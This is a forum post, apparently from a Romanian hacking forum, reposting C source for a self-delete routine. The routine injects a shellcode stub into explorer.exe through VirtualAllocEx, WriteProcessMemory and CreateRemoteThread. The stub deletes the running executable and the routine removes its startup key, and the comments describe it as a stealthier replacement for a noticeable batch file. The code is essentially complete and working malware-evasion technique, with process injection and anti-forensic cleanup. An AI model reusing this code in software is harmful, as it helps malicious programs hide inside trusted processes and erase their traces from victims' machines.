Jump to content
Nytro

[C] Self Delete - explorer.exe injection

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[C] Self Delete - explorer.exe injection

Author: __v00d00

// __v00d00 __ OpenSC.ws __
// A process cannot simply delete itself
// At some point, code will have to run in the context of another process
// People typically run a batch file in the background - but this can be noticable
// I inject an assembly stub into explorer.exe - it loops on DeleteFile
// Once the file is deleted the thread exits.
// I also have the thread sleep so that explorer.exe doesn't start eating up too many resources.
// Then the thread kills itself.

void selfDestruct()
{
	BYTE stub[] = {
	//	"\xcc" // debug int 3
		"\x68" "\xDE\xAD\xBE\xAF"		 // push argument  (pointer to path)
		"\xB8" "\xDE\xAD\xBA\xBE"		 // mov eax DeleteFile
		"\xFF\xD0"					 // call eax
		"\x50"					 // push eax
		"\x68" "\x00\x01\x00\x00"		 // push 100
		"\xB8" "\xDE\xAD\xBE\xAF"		 // mov eax Sleep
		"\xFF\xD0"					 // call eax
		"\x58"					 // pop eax
		"\x85\xc0"					 // test eax, eax
		"\x74\xe2"					 // jnz to start
		"\x6A" "\x00"				 // push 0
		"\xB8" "\xDE\xAD\xBE\xAF"		 // mov eax RtlExitUserThread
		"\xFF\xD0"					 // call eax
	};

	HANDLE hProc, hThread;
	DWORD pid;
	LPVOID pRemotePathStr, pRemoteStub;
	char ourPath[MAX_PATH];
	HMODULE hKernel;
	HMODULE hNtdll;
	DWORD dwDeleteFile;
	DWORD dwSleep;
	DWORD dwExitThread;

	GetModuleFileName(NULL, ourPath, MAX_PATH);
  	pid = GetPidByName("explorer.exe");
	if(!pid) return;

	hKernel = GetModuleHandle("kernel32.dll");
	if(!hKernel) return;

	hNtdll = GetModuleHandle("ntdll.dll");
	if(!hNtdll) return;

	dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
	dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
	dwExitThread = (DWORD)GetProcAddress(hNtdll, "RtlExitUserThread");

	hProc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, false, pid);
	if (hProc == NULL) return;

	pRemotePathStr = VirtualAllocEx(hProc, NULL, strlen(ourPath) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (pRemotePathStr == NULL) return;

	if (!WriteProcessMemory(hProc, pRemotePathStr, ourPath, strlen(ourPath) + 1, NULL)) return;

	pRemoteStub = VirtualAllocEx(hProc, NULL, sizeof(stub), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (pRemoteStub == NULL) return;

	memcpy(stub +  1, &pRemotePathStr, 4);
	memcpy(stub +  6, &dwDeleteFile, 4);
	memcpy(stub + 19, &dwSleep, 4);
	memcpy(stub + 33, &dwExitThread, 4);

	if (!WriteProcessMemory(hProc, pRemoteStub, stub, sizeof(stub), NULL))
		return;

	hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteStub, NULL, 0, 0);
	if (!hThread) return;

        DelStartUp(); // remove our startup key

	exit(1);
}

Sursa: Self Delete

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...